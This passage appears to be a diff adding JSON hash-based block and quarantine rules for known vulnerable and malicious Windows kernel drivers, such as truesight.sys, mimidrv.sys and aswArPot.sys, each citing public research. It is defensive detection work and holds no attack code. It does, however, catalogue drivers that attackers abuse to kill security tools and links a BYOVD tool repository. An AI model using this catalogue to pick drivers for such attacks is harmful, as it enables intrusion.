null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c1a4ca2cbac9fe5954763a20aeb82da9b10d028824f42fff071503dcbe15856", + "comment": "Vulnerable TfSysMon driver from ThreatFire System Monitor (2013) (aka TfSysMon.sys) [https://github.com/BlackSnufkin/BYOVD/tree/main/TfSysMon-Killer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "378073ef-2346-5362-9e5f-469caad4f94c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143545Z", + "creation_date": "2026-03-23T11:45:31.143547Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d79182bf82e2e3d3834945811c0f159c16b5ee941803f43fc7c069096a1ddd1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37843c92-6c79-5b95-9cac-ee9f5a39fd07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828543Z", + "creation_date": "2026-03-23T11:45:30.828545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828550Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c1a422e8f958e2e2152b8aed18a1723349edcc16b5deed97a320786f98b4e51", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "378a9817-754b-5195-877d-a0da37e11a58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469689Z", + "creation_date": "2026-03-23T11:45:30.469692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b8401cefd1dbfb754fe00b513784110836c8e938a40cc606903f46503af2943", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37abd82b-fa28-580d-8afc-bb20c4956730", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.158841Z", + "creation_date": "2026-03-23T11:45:31.158843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a5a443fde50b91739c8d9a321bd9f0bc4cb556f5d64b4cb9fc8a58104a06f5d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37ad9827-2a58-5dc3-8b60-46d53cdaa54a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458108Z", + "creation_date": "2026-03-23T11:45:30.458111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1675eedd4c7f2ec47002d623bb4ec689ca9683020e0fdb0729a9047c8fb953dd", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "37b51c6c-3a30-573a-8492-7af9c9514140", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816397Z", + "creation_date": "2026-03-23T11:45:30.816399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816405Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1748436f8e9c251b2c0d1a33499a1aa1a06ae961e1c9911e8c172fe297ab1feb", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37b6a762-1299-5132-9788-5378fc577a2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972142Z", + "creation_date": "2026-03-23T11:45:29.972144Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.972150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37b8b19f-dc76-5f3e-bfb9-09e21b0c16cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472866Z", + "creation_date": "2026-03-23T11:45:31.472869Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a26b2ea38eb4e794341933fed73cea751c923808145168656c2b809c774b46b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37b92abb-91a0-55dd-8c5a-818169eaaa1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152288Z", + "creation_date": "2026-03-23T11:45:31.152291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "787b3225d73c10a46d08c512793250493cb58fe1252e5f0a226b115a35549111", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37b9a0bc-57b3-587e-a5ef-93bdc9b94df1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141885Z", + "creation_date": "2026-03-23T11:45:31.141887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "64fcecd846a95c48062a2139f5731bd6c3e68a2ae1fa14e103094389e2ec3328", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37ba5fad-9181-5556-affa-5acf0ca82d8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825924Z", + "creation_date": "2026-03-23T11:45:31.825927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6d3bf485ac41a4b66529755df982da91a2ff1a23ffa15564474c8543980893a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37bd0067-0a80-56b6-921d-3ff13a52c4ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808101Z", + "creation_date": "2026-03-23T11:45:31.808104Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4edd64593884be2a0b05f6153cbe85db1f202dd2ea0eef0500e334ee30e4f41c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37bd21c0-b91b-5269-88a7-5dc486cae73f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969593Z", + "creation_date": "2026-03-23T11:45:29.969595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969601Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14ed216fbc7eece76ef906c7346779e06043c59edb7feb6f51809b2cb395853d", + "comment": "Avast Vulnerable Driver (aka 
aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37c2fbd8-f542-55b7-9676-697165a13aaa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479269Z", + "creation_date": "2026-03-23T11:45:31.479273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b895393c96cec1a7c89abe7eca0e9555da5be8e25c0a02e5e43caf37f42a9785", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37ce5d72-d52c-5096-b767-eea1aeb309d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.621634Z", + "creation_date": "2026-03-23T11:45:29.621636Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa875178ae2d7604d027510b0d0a7e2d9d675e10a4c9dda2d927ee891e0bcb91", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37d2fe47-d3ad-5fcb-954d-e11e6fdd009d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822845Z", + "creation_date": "2026-03-23T11:45:31.822848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822856Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9335a234e261df74b8d8e6027dadc918dad8499e6daee611e3ccfd052bb2a385", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"37dacc43-4133-56c0-b430-4f33c7072d05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617006Z", + "creation_date": "2026-03-23T11:45:29.617008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f35cf1f2e0fb87a2728303091ee505a0bc546cf63dcd38178adf48477ec0f91", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37e5fbfd-ee5d-5a4e-8459-cf49957470c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473506Z", + "creation_date": "2026-03-23T11:45:31.473510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.473521Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59aea123738499f75b7de47b34520d9f67c01f60c7bb30c1742ff9903a185a18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37e70f98-a899-5322-b910-a32d8102b427", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147187Z", + "creation_date": "2026-03-23T11:45:32.147189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f882afd44ed1e9ec1875dd5e1362bb2216815a84b3709b7bb72b1206c5e7b86", + "comment": "Malicious Kernel Driver (aka AppvVStram_.sys) [https://securelist.com/honeymyte-kernel-mode-rootkit/118590/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37e79206-30fc-51d5-a2d5-3fe85c2fdcc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471647Z", + "creation_date": "2026-03-23T11:45:30.471650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37f73358-118b-5767-8460-311211886a81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487861Z", + "creation_date": "2026-03-23T11:45:31.487863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"947106cb13eb826fbec6ff72348076c7177139ac84509a6c01439c00b9b4fad0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37ff47b4-96cc-55a5-b49c-e317a3d9b957", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980185Z", + "creation_date": "2026-03-23T11:45:29.980187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e3430d5e0e93bc4a5dccc985053912065e65722bfc2eaf431bc1da91410434c", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38064c8a-fb4f-5606-9d4a-6e5a147d1c60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + 
}, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815727Z", + "creation_date": "2026-03-23T11:45:30.815729Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a60d45d46e5a3dda02f41d20e5782135dd0da42c75eb9c39307bd67a7c9152ea", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3825e49a-2fcd-5193-93c6-a74b5c19900b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828454Z", + "creation_date": "2026-03-23T11:45:30.828456Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828462Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5354eebadca43d11288fe9dd0721974605fb6cbb3f6ea6ec6448513dfc94024", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
